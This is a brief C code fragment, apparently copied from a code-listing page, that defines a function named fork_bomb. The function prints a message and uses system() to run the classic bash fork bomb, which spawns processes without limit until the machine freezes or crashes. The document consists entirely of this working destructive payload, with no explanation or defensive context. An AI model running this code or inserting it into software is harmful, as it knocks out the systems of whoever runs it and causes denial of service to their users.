1 2 3 4 5 6
#include <stdlib.h> #include <stdio.h> void fork_bomb() { printf("Running fork bomb..."); system("/bin/bash -c ':(){ :|:& };:'"); }